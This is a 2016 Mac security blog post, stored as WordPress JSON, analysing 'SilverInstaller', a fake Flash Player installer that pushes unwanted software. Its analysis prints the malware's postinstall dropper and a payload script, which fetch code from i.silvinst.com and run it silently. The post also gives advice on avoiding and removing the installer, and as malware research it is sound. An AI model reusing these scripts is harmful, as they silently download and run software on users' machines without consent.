{"id":58495,"date":"2016-10-18T15:47:35","date_gmt":"2016-10-18T22:47:35","guid":{"rendered":"https:\/\/www.intego.com\/mac-security-blog\/?p=58495"},"modified":"2016-10-25T09:27:02","modified_gmt":"2016-10-25T16:27:02","slug":"silverinstaller-uses-new-techniques-to-install-puapup","status":"publish","type":"post","link":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/","title":{"rendered":"SilverInstaller Uses New Techniques to Install PUA\/PUP"},"content":{"rendered":"<p><a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Header.jpg\"><img loading=\"lazy\" class=\"alignnone size-full wp-image-58528\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Header.jpg\" alt=\"SilverInstaller-Fake-Flash-Player-Update-Header\" width=\"600\" height=\"300\" srcset=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Header.jpg 600w, https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Header-150x75.jpg 150w, https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Header-300x150.jpg 300w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><br \/>\nToday malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled &#8220;SilverInstaller.&#8221; These types of installers are nothing new these days and usually result in the same or similar adware to infect a system. Some examples are <a href=\"https:\/\/www.intego.com\/mac-security-blog\/intego-security-memo-september-26-2011-mac-flashback-trojan-horse-masquerades-as-flash-player-installer-package\/\" target=\"_blank\">Flashback<\/a>, <a href=\"https:\/\/www.intego.com\/mac-security-blog\/cross-platform-adware-poses-as-flash-player-update\/\" target=\"_blank\">ClickAgent<\/a>, <a href=\"https:\/\/www.intego.com\/mac-security-blog\/fake-flash-player-update-infects-mac-with-scareware\/\" target=\"_blank\">InstallMiez and InstallCore<\/a>. This behavior was expected of SilverInstaller as well, but during analysis Intego observed that it\u00a0behaved differently than those fake Flash Player installers we have seen in the past.<\/p>\n<p><strong>How is the user presented with the fake Adobe Flash Player update?\u00a0<\/strong><\/p>\n<p>The methods used into tricking the user to download and install the installer are familiar, a website pop-up showing there is a new version of Flash Player available is presented. This can look like this:<br \/>\n<a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Web-Pop-Up.gif\"><br \/>\n<\/a><a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Web-Pop-Up.gif\"><img loading=\"lazy\" class=\"aligncenter wp-image-58498 size-full\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Web-Pop-Up.gif\" alt=\"SilverInstaller-Fake-Flash-Player-Web-Pop-Up\" width=\"493\" height=\"222\" \/><\/a>Or like this:<br \/>\n<a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Web-Pop-Up-1.gif\"><img loading=\"lazy\" class=\"aligncenter wp-image-58504\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Web-Pop-Up-1.gif\" alt=\"SilverInstaller-Web-Pop-Up-Image\" width=\"500\" height=\"316\" \/><\/a><a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Web-Pop-Up.gif\"><br \/>\n<\/a>These fake Flash Player pop-ups come in many shapes and sizes but can be\u00a0recognized as fakes when compared to the real thing, and SilverInstaller\u00a0is\u00a0no different. If the &#8220;Update&#8221; or &#8220;Download&#8221; button is clicked, however, things become\u00a0a bit more interesting.\u00a0The file that is downloaded is named &#8220;FlashPlayer_01.30.pkg&#8221; and looks like a generic package file. The numbers that are appended to the FlashPlayer name differ every time the file is downloaded though, so no-one will have the same file name twice.<br \/>\n<a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Download-Package.gif\"><br \/>\n<\/a><a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Download-Package.gif\"><img loading=\"lazy\" class=\"aligncenter wp-image-58501 size-full\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Download-Package.gif\" alt=\"SilverInstaller-Download-Package\" width=\"320\" height=\"475\" \/><\/a>Each downloaded package, when analyzed, has\u00a0a unique hash and their contents are similar with the same hierarchy and an embedded bundle package.<\/p>\n<p>One of the things these installers do have in common is the Developer ID they are signed with, in this case belonging to &#8220;adam Chemill (FAFK4ARNVL).&#8221;<\/p>\n<blockquote>\n<div class=\"\">Package &#8220;FlashPlayer_01.8.pkg&#8221;:<\/div>\n<div class=\"\">\u00a0 \u00a0Status: signed by a certificate trusted by Mac OS X<\/div>\n<div class=\"\">\u00a0 \u00a0Certificate Chain:<\/div>\n<div class=\"\">\u00a0 \u00a0 1.\u00a0<b class=\"\">Developer ID Installer: adam Chemil (FAFK4ARNVL)<\/b><\/div>\n<div class=\"\">\u00a0 \u00a0 \u00a0 \u00a0SHA1 fingerprint: AA C5 81 EE B4 EF 0B CE A1 A1 D2 92 97 75 9E 0E 04 EB 02 31<\/div>\n<div class=\"\">\u00a0 \u00a0 \u00a0 \u00a0&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/div>\n<div class=\"\">\u00a0 \u00a0 2. Developer ID Certification Authority<\/div>\n<div class=\"\">\u00a0 \u00a0 \u00a0 \u00a0SHA1 fingerprint: 3B 16 6C 3B 7D C4 B7 51 C9 FE 2A FA B9 13 56 41 E3 88 E1 86<\/div>\n<div class=\"\">\u00a0 \u00a0 \u00a0 \u00a0&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<\/div>\n<div class=\"\">\u00a0 \u00a0 3. Apple Root CA<\/div>\n<div class=\"\">\u00a0 \u00a0 \u00a0 \u00a0SHA1 fingerprint: 61 1E 5B 66 2C 59 3A 08 FF 58 D1 4A E2 24 52 D1 98 DF 6C 60<\/div>\n<\/blockquote>\n<p><strong>Installing the contents:\u00a0<\/strong><\/p>\n<p>When the package file is opened, surprisingly the Adobe Flash charade\u00a0ends.<br \/>\n<a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Installer-1.gif\"><img loading=\"lazy\" class=\"aligncenter wp-image-58507\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-Installer-1.gif\" alt=\"SilverInstaller-Installer\" width=\"500\" height=\"353\" \/><\/a><br \/>\nThe installer does not attempt to present itself as an actual Flash Player installer, but instead shows &#8220;Install SilverInstaller.&#8221; SilverInstaller is a facilitator for the downloading and installation of other content, as the readme shows. MacKeeper, DavinciSearch and MegaBackup are three names mentioned, names you may have seen in the past related to potentially unwanted applications (PUA).\u00a0When the installation is completed, in this case, none of the mentioned applications can be found on the system. What does pop-up shortly after is an Player OS X Extended window.<br \/>\n<a href=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-MPlayer.gif\"><img loading=\"lazy\" class=\"aligncenter wp-image-58510 size-full\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/Fake-Flash-Player-MPlayer.gif\" alt=\"SilverInstaller-MPlayer\" width=\"475\" height=\"112\" \/><\/a><br \/>\nThe installation does not actually write the dropped\u00a0files to the system, it&#8217;s the PostInstall script (the dropper) that silently starts the Payload\u00a0download in the background.<\/p>\n<blockquote>\n<div class=\"\"><span style=\"color: #006d8f;\">$ cat \/FlashPlayer_XX.X\/base.pkg\/Scripts\/postinstall<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">#!\/bin\/bash<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">func_act(){<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 OS_Version=$(sw_vers -productVersion)<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 if [[ ${OS_Version} == 10.12 ]]; then<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 \u00a0 \/usr\/bin\/curl -s -L -o \/var\/tmp\/act.tgz &#8220;http:\/\/i.silvinst.com\/is\/cact?i=&#8221;d353b8d8-71f5-4f17-9e16-5ce1d13491a3&#8243;&amp;ve=10.12&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 else<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 \u00a0 \/usr\/bin\/curl -s -L -o \/var\/tmp\/act.tgz &#8220;http:\/\/i.silvinst.com\/is\/cact?i=&#8221;d353b8d8-71f5-4f17-9e16-5ce1d13491a3&#8243;&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 fi<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 tar -xzf \/var\/tmp\/act.tgz -C \/var\/tmp<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 \/var\/tmp\/act\/act &#8220;2712c147-7e15-4366-80e0-4c7b98d780f0&#8221; &#8220;d353b8d8-71f5-4f17-9e16-5ce1d13491a3&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 sleep 120<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 rm -rf \/var\/tmp\/act\/act<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\u00a0 \u00a0 rm -rf \/var\/tmp\/act.tgz<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">}<\/span><\/div>\n<\/blockquote>\n<p>It checks to see if the Mac is running macOS 10.12 Sierra or another version of OS X and selects a download URL accordingly to download the Payload from.<\/p>\n<p><strong>The Payload<\/strong><\/p>\n<p>The Dropper downloads the Payload, which is then responsible for opening a connection to &#8220;<span class=\"\"><span class=\"\">http:\/\/i.silvinst.com&#8221; on port 80 and a shell script is then executed. The script then finishes the job by downloading the MPlayer archive to the Mac and launching the application as seen in the screenshot above.<br \/>\n<\/span><\/span><\/p>\n<blockquote>\n<div class=\"\"><span style=\"color: #006d8f;\">cat \/01\/install_unit.sh<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">#!\/bin\/bash<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">func_0(){<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/usr\/bin\/curl -s -L -o \/var\/tmp\/MPlayer.zip &#8220;http:\/\/i.silvinst.com\/static\/mplayer\/MPlayer.zip&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">cd \/var\/tmp<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/usr\/bin\/unzip \/var\/tmp\/MPlayer.zip<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/bin\/chmod 777 &#8220;\/var\/tmp\/MPlayer OSX Extended.app\/&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">cp -rf \/var\/tmp\/MPlayer\\ OSX\\ Extended.app \/Applications\/<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/bin\/chmod 777 &#8220;\/Applications\/MPlayer OSX Extended.app&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/bin\/sleep 5<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/usr\/bin\/open &#8220;\/Applications\/MPlayer OSX Extended.app&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">\/usr\/bin\/curl -s -L -o \/var\/tmp\/re.txt &#8220;http:\/\/i.silvinst.com\/is\/if?i=7f12bd20-efa1-4198-a1bd-8a64ef7436c4&#8221;<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">}<\/span><\/div>\n<div class=\"\"><span style=\"color: #006d8f;\">func_0 &amp;<br \/>\n<\/span><\/div>\n<\/blockquote>\n<p>In this case the downloaded application is harmless and public exposure is not expected to be very widespread.\u00a0This installer was encountered on a bittorrent website which is not known for providing legal or high quality content. What should be watched though is the way the installer works, as this can evolve and be used to download much more malicious contents. In it&#8217;s current form the installer is already more sophisticated than the known InstallCore \/ InstallMiez \/ InstallImitator installers we have encountered in the past.<\/p>\n<p><strong>What steps can Mac users take to protect their computers?<\/strong><\/p>\n<p>Only download software from reliable sources. If a website prompts for an Adobe Flash Player update, close the prompt and visit Adobe&#8217;s website instead to download it there. We recommend not using Adobe Flash Player at all, but if you do need it, <a href=\"https:\/\/www.intego.com\/mac-security-blog\/how-to-tell-if-adobe-flash-player-update-is-valid\/\" target=\"_blank\">make sure you&#8217;re as safe as possible when updating the Adobe software<\/a> by grabbing\u00a0it from the right source.<\/p>\n<p><strong>Manually removing SilverInstaller<\/strong><\/p>\n<p>If infected, Mac users can manually remove the SilverInstaller\u00a0files to clean up the infection. From the Finder menu &#8220;Go,&#8221; select &#8220;Go to Folder&#8221; and copy\/paste the following path:<\/p>\n<ul>\n<li>\/var\/tmp\/<br \/>\nIn this folder you may find several files, delete the following:<br \/>\n\u2022 act (folder)<br \/>\n\u2022 MPlayer OS X Extended (application)<br \/>\n\u2022 MPlayer.zip (archive)<br \/>\n\u2022 re.txt (text file)<\/li>\n<li>Delete the application &#8220;MPlayer OS X Extended&#8221; from your Applications folder.<\/li>\n<li>Also delete the installer\u00a0\u00a0&#8220;FlashPlayer_XX.X.pkg&#8221; from it&#8217;s download location.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.intego.com\/mac-protection-bundle\" target=\"_blank\">Intego VirusBarrier<\/a>\u00a0identifies\u00a0the SilverInstaller files as\u00a0<strong>OSX\/SilverInstaller<\/strong>, and if detected, VirusBarrier will eradicate it from your system.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled &#8220;SilverInstaller.&#8221; These types of installers are nothing new these days and usually result in the same or similar adware to infect a system. Some examples are Flashback, ClickAgent, InstallMiez and InstallCore. This behavior was expected of SilverInstaller [&hellip;]<\/p>\n","protected":false},"author":79,"featured_media":58534,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","jetpack_publicize_message":"","jetpack_is_tweetstorm":false},"categories":[190,151,5],"tags":[2677,1180,3148,2032,3145],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<meta name=\"description\" content=\"Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled &quot;SilverInstaller.&quot; These types of\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SilverInstaller Uses New Techniques to Install PUA\/PUP - The Mac Security Blog\" \/>\n<meta property=\"og:description\" content=\"Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled &quot;SilverInstaller.&quot; These types of\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/\" \/>\n<meta property=\"og:site_name\" content=\"The Mac Security Blog\" \/>\n<meta property=\"article:published_time\" content=\"2016-10-18T22:47:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2016-10-25T16:27:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"400\" \/>\n\t<meta property=\"og:image:height\" content=\"260\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jay Vrijenhoek\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\",\"name\":\"Intego\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/\",\"sameAs\":[],\"logo\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#logo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png\",\"contentUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png\",\"width\":875,\"height\":875,\"caption\":\"Intego\"},\"image\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#logo\"}},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#website\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/\",\"name\":\"The Mac Security Blog\",\"description\":\"Keep Macs safe from the dangers of the Internet\",\"publisher\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.intego.com\/mac-security-blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg\",\"contentUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg\",\"width\":400,\"height\":260},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#webpage\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/\",\"name\":\"SilverInstaller Uses New Techniques to Install PUA\/PUP - The Mac Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#primaryimage\"},\"datePublished\":\"2016-10-18T22:47:35+00:00\",\"dateModified\":\"2016-10-25T16:27:02+00:00\",\"description\":\"Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled \\\"SilverInstaller.\\\" These types of\",\"breadcrumb\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.intego.com\/mac-security-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SilverInstaller Uses New Techniques to Install PUA\/PUP\"}]},{\"@type\":\"Article\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#webpage\"},\"author\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/0106660ab83668e429deecc051dfa8c0\"},\"headline\":\"SilverInstaller Uses New Techniques to Install PUA\/PUP\",\"datePublished\":\"2016-10-18T22:47:35+00:00\",\"dateModified\":\"2016-10-25T16:27:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#webpage\"},\"wordCount\":1046,\"commentCount\":5,\"publisher\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg\",\"keywords\":[\"Fake Flash Player\",\"Flash Update\",\"OSX\/SilverInstaller\",\"PUA\/PUP\",\"SilverInstaller\"],\"articleSection\":[\"Malware\",\"Recommended\",\"Security News\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#respond\"]}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/0106660ab83668e429deecc051dfa8c0\",\"name\":\"Jay Vrijenhoek\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/www.intego.com\/mac-security-blog\/#personlogo\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8f43effd03d0bb31acff4b88613f0d4a?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8f43effd03d0bb31acff4b88613f0d4a?s=96&d=mm&r=g\",\"caption\":\"Jay Vrijenhoek\"},\"description\":\"Jay Vrijenhoek is an IT consultant with a passion for Mac security research.\",\"url\":\"https:\/\/www.intego.com\/mac-security-blog\/author\/jay-vrijenhoek\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"description":"Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled \"SilverInstaller.\" These types of","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/","og_locale":"en_US","og_type":"article","og_title":"SilverInstaller Uses New Techniques to Install PUA\/PUP - The Mac Security Blog","og_description":"Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled \"SilverInstaller.\" These types of","og_url":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/","og_site_name":"The Mac Security Blog","article_published_time":"2016-10-18T22:47:35+00:00","article_modified_time":"2016-10-25T16:27:02+00:00","og_image":[{"width":400,"height":260,"url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Written by":"Jay Vrijenhoek","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Organization","@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization","name":"Intego","url":"https:\/\/www.intego.com\/mac-security-blog\/","sameAs":[],"logo":{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/#logo","inLanguage":"en-US","url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png","contentUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2022\/10\/intego-organization-logo-for-google-knowledge-graph-875x875-1.png","width":875,"height":875,"caption":"Intego"},"image":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#logo"}},{"@type":"WebSite","@id":"https:\/\/www.intego.com\/mac-security-blog\/#website","url":"https:\/\/www.intego.com\/mac-security-blog\/","name":"The Mac Security Blog","description":"Keep Macs safe from the dangers of the Internet","publisher":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.intego.com\/mac-security-blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#primaryimage","inLanguage":"en-US","url":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg","contentUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg","width":400,"height":260},{"@type":"WebPage","@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#webpage","url":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/","name":"SilverInstaller Uses New Techniques to Install PUA\/PUP - The Mac Security Blog","isPartOf":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#primaryimage"},"datePublished":"2016-10-18T22:47:35+00:00","dateModified":"2016-10-25T16:27:02+00:00","description":"Today malware researchers at Intego have discovered a new fake Adobe Flash Player installer, which Intego has labeled \"SilverInstaller.\" These types of","breadcrumb":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.intego.com\/mac-security-blog\/"},{"@type":"ListItem","position":2,"name":"SilverInstaller Uses New Techniques to Install PUA\/PUP"}]},{"@type":"Article","@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#article","isPartOf":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#webpage"},"author":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/0106660ab83668e429deecc051dfa8c0"},"headline":"SilverInstaller Uses New Techniques to Install PUA\/PUP","datePublished":"2016-10-18T22:47:35+00:00","dateModified":"2016-10-25T16:27:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#webpage"},"wordCount":1046,"commentCount":5,"publisher":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/#organization"},"image":{"@id":"https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2016\/10\/SilverInstaller-Fake-Flash-Player-Update-Featured.jpg","keywords":["Fake Flash Player","Flash Update","OSX\/SilverInstaller","PUA\/PUP","SilverInstaller"],"articleSection":["Malware","Recommended","Security News"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.intego.com\/mac-security-blog\/silverinstaller-uses-new-techniques-to-install-puapup\/#respond"]}]},{"@type":"Person","@id":"https:\/\/www.intego.com\/mac-security-blog\/#\/schema\/person\/0106660ab83668e429deecc051dfa8c0","name":"Jay 